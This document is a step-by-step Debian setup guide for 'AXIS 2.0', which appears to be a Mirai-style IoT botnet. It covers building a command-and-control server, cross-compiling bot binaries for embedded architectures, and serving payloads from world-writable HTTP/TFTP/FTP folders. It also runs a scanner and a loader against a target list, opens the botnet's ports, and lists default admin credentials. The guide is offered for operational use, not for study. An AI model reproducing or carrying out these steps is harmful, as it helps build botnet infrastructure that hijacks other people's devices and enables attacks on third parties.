================================================================================
                    AXIS 2.0 INSTALLATION TUTORIAL
                    Debian 10/11 (Buster/Bullseye)
================================================================================

This tutorial will guide you through setting up AXIS 2.0 on Debian Server.

================================================================================
STEP 1: SYSTEM UPDATE AND BASIC PACKAGES
================================================================================

sudo apt update && sudo apt upgrade -y
sudo apt install -y screen wget curl git build-essential

================================================================================
STEP 2: INSTALL GO (Required for C&C Server)
================================================================================

# Option A: Install from Debian repos (may be older version)
sudo apt install -y golang-go

# Option B: Install latest from source (recommended)
cd /tmp
wget https://go.dev/dl/go1.19.5.linux-amd64.tar.gz
sudo tar -C /usr/local -xzf go1.19.5.linux-amd64.tar.gz
echo 'export PATH=$PATH:/usr/local/go/bin' >> ~/.bashrc
source ~/.bashrc

# Verify
go version

================================================================================
STEP 3: INSTALL MARIADB DATABASE
================================================================================

# Install MariaDB
sudo apt install -y mariadb-server mariadb-client

# Start MariaDB
sudo systemctl start mariadb
sudo systemctl enable mariadb

# Secure installation
sudo mysql_secure_installation

# Create database
sudo mysql -u root -p << EOF
CREATE DATABASE AXIS2;
CREATE USER 'axis'@'localhost' IDENTIFIED BY 'axis_password_123';
GRANT ALL PRIVILEGES ON AXIS2.* TO 'axis'@'localhost';
FLUSH PRIVILEGES;
EXIT;
EOF

================================================================================
STEP 4: INSTALL CROSS-COMPILERS
================================================================================

# Enable non-free repos if needed
echo "deb http://deb.debian.org/debian bullseye main contrib non-free" >> /etc/apt/sources.list
sudo apt update

# Install cross-compilers
sudo apt install -y \
    gcc-arm-linux-gnueabi \
    gcc-arm-linux-gnueabihf \
    gcc-aarch64-linux-gnu \
    gcc-mips-linux-gnu \
    gcc-mipsel-linux-gnu \
    gcc-powerpc-linux-gnu \
    gcc-sparc64-linux-gnu

================================================================================
STEP 5: INSTALL WEB SERVERS
================================================================================

# Install Apache
sudo apt install -y apache2

# Create directories
sudo mkdir -p /var/www/html/bins
sudo chmod 777 /var/www/html/bins

# Install TFTP
sudo apt install -y tftpd-hpa
sudo mkdir -p /var/lib/tftpboot
sudo chmod 777 /var/lib/tftpboot

# Configure TFTP
echo "TFTP_ENABLED=yes" | sudo tee -a /etc/default/tftpd-hpa
echo "TFTP_DIRECTORY=/var/lib/tftpboot" | sudo tee -a /etc/default/tftpd-hpa
sudo systemctl restart tftpd-hpa

# Install FTP
sudo apt install -y vsftpd
sudo mkdir -p /var/ftp
sudo chmod 777 /var/ftp

================================================================================
STEP 6: BUILD AXIS 2.0
================================================================================

cd /root/production\ source
chmod +x build.sh

# Install Go dependencies
cd cnc
go mod init production-cnc
go get github.com/go-sql-driver/mysql
go get github.com/mattn/go-shellwords
cd ..

# Build
./build.sh

================================================================================
STEP 7: IMPORT DATABASE
================================================================================

sudo mysql -u root -p < database.sql

# Change admin password
sudo mysql -u root -p AXIS2 -e "UPDATE users SET password='YOUR_NEW_PASSWORD' WHERE username='admin';"

================================================================================
STEP 8: CONFIGURE
================================================================================

# Edit configurations
nano cnc/main.go      # Database settings
nano bot/config.h     # C&C address
nano loader/config.h  # HTTP/TFTP servers
nano dlr/dlr.h        # Download server

================================================================================
STEP 9: RUN AXIS 2.0
================================================================================

# Start in screen sessions
screen -S cnc -dm ./cnc_server
screen -S scan -dm ./scanListen
screen -S loader -dm bash -c './loader < list.txt'

# View screens
screen -r cnc
screen -r scan
screen -r loader

================================================================================
STEP 10: FIREWALL (UFW or IPTABLES)
================================================================================

# Using UFW
sudo apt install -y ufw
sudo ufw allow 3778/tcp
sudo ufw allow 3779/tcp
sudo ufw allow 9555/tcp
sudo ufw allow 80/tcp
sudo ufw allow 69/udp
sudo ufw enable

# Using IPTABLES
sudo iptables -A INPUT -p tcp --dport 3778 -j ACCEPT
sudo iptables -A INPUT -p tcp --dport 3779 -j ACCEPT
sudo iptables -A INPUT -p tcp --dport 9555 -j ACCEPT
sudo iptables -A INPUT -p tcp --dport 80 -j ACCEPT
sudo iptables -A INPUT -p udp --dport 69 -j ACCEPT
sudo iptables-save > /etc/iptables/rules.v4

================================================================================
DEFAULT CREDENTIALS
================================================================================

Database: AXIS2 / axis / axis_password_123
Admin: admin / dhcp146E
API Key: AXIS2-ADMIN-7F3D9A2B-E8C1-4F6A

================================================================================
TROUBLESHOOTING
================================================================================

# Check if MariaDB is running
systemctl status mariadb

# Check Go installation
which go
go version

# Check Apache
systemctl status apache2

# View logs
tail -f /var/log/apache2/error.log

================================================================================
